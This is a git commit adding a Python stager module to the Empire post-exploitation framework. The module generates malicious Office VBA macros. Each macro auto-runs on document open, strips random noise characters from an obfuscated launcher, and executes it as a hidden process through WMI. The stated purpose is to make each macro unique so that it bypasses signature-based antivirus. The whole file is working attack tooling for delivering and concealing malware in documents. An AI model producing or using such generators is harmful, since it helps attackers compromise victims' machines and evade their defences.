Create scrambled_macro.py
Stager based on the normal macro stager. Adds "noise" to the payload to help evading signature based AV solutions1.6
parent
e4aff013d5
commit
68935276ff
|
@ -0,0 +1,150 @@
|
|||
from lib.common import helpers
|
||||
import random
|
||||
|
||||
class Stager:
|
||||
|
||||
def __init__(self, mainMenu, params=[]):
|
||||
|
||||
self.info = {
|
||||
'Name': 'Scrambled_Macro',
|
||||
|
||||
'Author': ['@enigma0x3', '@harmj0y', 'Rob Schoemaker'],
|
||||
|
||||
'Description': ('Generates a scrambled office macro for Empire, compatible with office 97-2003, and 2007 file types.\nEach generated macro is unique in order to bypass AV.'),
|
||||
|
||||
'Comments': [
|
||||
'http://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/'
|
||||
]
|
||||
}
|
||||
|
||||
# any options needed by the stager, settable during runtime
|
||||
self.options = {
|
||||
# format:
|
||||
# value_name : {description, required, default_value}
|
||||
'Listener' : {
|
||||
'Description' : 'Listener to generate stager for.',
|
||||
'Required' : True,
|
||||
'Value' : ''
|
||||
},
|
||||
'StagerRetries' : {
|
||||
'Description' : 'Times for the stager to retry connecting.',
|
||||
'Required' : False,
|
||||
'Value' : '0'
|
||||
},
|
||||
'OutFile' : {
|
||||
'Description' : 'File to output macro to, otherwise displayed on the screen.',
|
||||
'Required' : False,
|
||||
'Value' : '/tmp/scrambled'
|
||||
},
|
||||
'NoiseLevel' : {
|
||||
'Description' : 'Sets the amount of noise to add (default=3, 0=no noise)',
|
||||
'Required' : True,
|
||||
'Value' : '3'
|
||||
},
|
||||
'UserAgent' : {
|
||||
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
|
||||
'Required' : False,
|
||||
'Value' : 'default'
|
||||
},
|
||||
'Proxy' : {
|
||||
'Description' : 'Proxy to use for request (default, none, or other).',
|
||||
'Required' : False,
|
||||
'Value' : 'default'
|
||||
},
|
||||
'ProxyCreds' : {
|
||||
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
|
||||
'Required' : False,
|
||||
'Value' : 'default'
|
||||
}
|
||||
}
|
||||
|
||||
# save off a copy of the mainMenu object to access external functionality
|
||||
# like listeners/agent handlers/etc.
|
||||
self.mainMenu = mainMenu
|
||||
|
||||
for param in params:
|
||||
# parameter format is [Name, Value]
|
||||
option, value = param
|
||||
if option in self.options:
|
||||
self.options[option]['Value'] = value
|
||||
|
||||
def addnoise(self, payload,level=1):
|
||||
charset='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-+={}[];:|,.<>?~_'
|
||||
noisechars=''
|
||||
|
||||
for character in charset:
|
||||
if(not character in payload):
|
||||
noisechars += character
|
||||
|
||||
scrambledpayload = ''
|
||||
|
||||
random.seed()
|
||||
|
||||
shuffled = "".join(random.sample(noisechars, len(noisechars)))
|
||||
noisechars = shuffled
|
||||
|
||||
for character in payload:
|
||||
action = random.randint(0,level)
|
||||
while(action!=0):
|
||||
scrambledpayload += random.choice(noisechars)
|
||||
action = random.randint(0,level)
|
||||
scrambledpayload += character
|
||||
|
||||
return scrambledpayload, noisechars
|
||||
|
||||
|
||||
def generate(self):
|
||||
|
||||
# extract all of our options
|
||||
listenerName = self.options['Listener']['Value']
|
||||
userAgent = self.options['UserAgent']['Value']
|
||||
proxy = self.options['Proxy']['Value']
|
||||
proxyCreds = self.options['ProxyCreds']['Value']
|
||||
stagerRetries = self.options['StagerRetries']['Value']
|
||||
noiselevel = int(self.options['NoiseLevel']['Value'])
|
||||
|
||||
# generate the launcher code
|
||||
launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries)
|
||||
|
||||
if launcher == "":
|
||||
print helpers.color("[!] Error in launcher command generation.")
|
||||
return ""
|
||||
else:
|
||||
launcher, noise = self.addnoise(launcher, noiselevel)
|
||||
chunks = list(helpers.chunks(launcher, 50))
|
||||
payload = "\tDim Str As String\n"
|
||||
payload += "\tDim Noise As String\n"
|
||||
payload += "\tDim Counter As Integer\n"
|
||||
payload += "\tnoise = \"" + noise + "\"\n"
|
||||
payload += "\tstr = \"" + str(chunks[0]) + "\"\n"
|
||||
for chunk in chunks[1:]:
|
||||
payload += "\tstr = str + \"" + str(chunk) + "\"\n"
|
||||
|
||||
payload += "\tFor counter = 1 to len(noise)\n"
|
||||
payload += "\tstr = replace(str,mid(noise,counter,1),\"\")\n"
|
||||
payload += "\tNext\n"
|
||||
|
||||
macro = "Sub Auto_Open()\n"
|
||||
macro += "\tDebugging\n"
|
||||
macro += "End Sub\n\n"
|
||||
macro = "Sub AutoOpen()\n"
|
||||
macro += "\tDebugging\n"
|
||||
macro += "End Sub\n\n"
|
||||
|
||||
macro += "Sub Document_Open()\n"
|
||||
macro += "\tDebugging\n"
|
||||
macro += "End Sub\n\n"
|
||||
|
||||
macro += "Public Function Debugging() As Variant\n"
|
||||
macro += payload
|
||||
macro += "\tConst HIDDEN_WINDOW = 0\n"
|
||||
macro += "\tstrComputer = \".\"\n"
|
||||
macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n"
|
||||
macro += "\tSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\n"
|
||||
macro += "\tSet objConfig = objStartup.SpawnInstance_\n"
|
||||
macro += "\tobjConfig.ShowWindow = HIDDEN_WINDOW\n"
|
||||
macro += "\tSet objProcess = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n"
|
||||
macro += "\tobjProcess.Create str, Null, objConfig, intProcessID\n"
|
||||
macro += "End Function\n"
|
||||
|
||||
return macro
|
Loading…
Reference in New Issue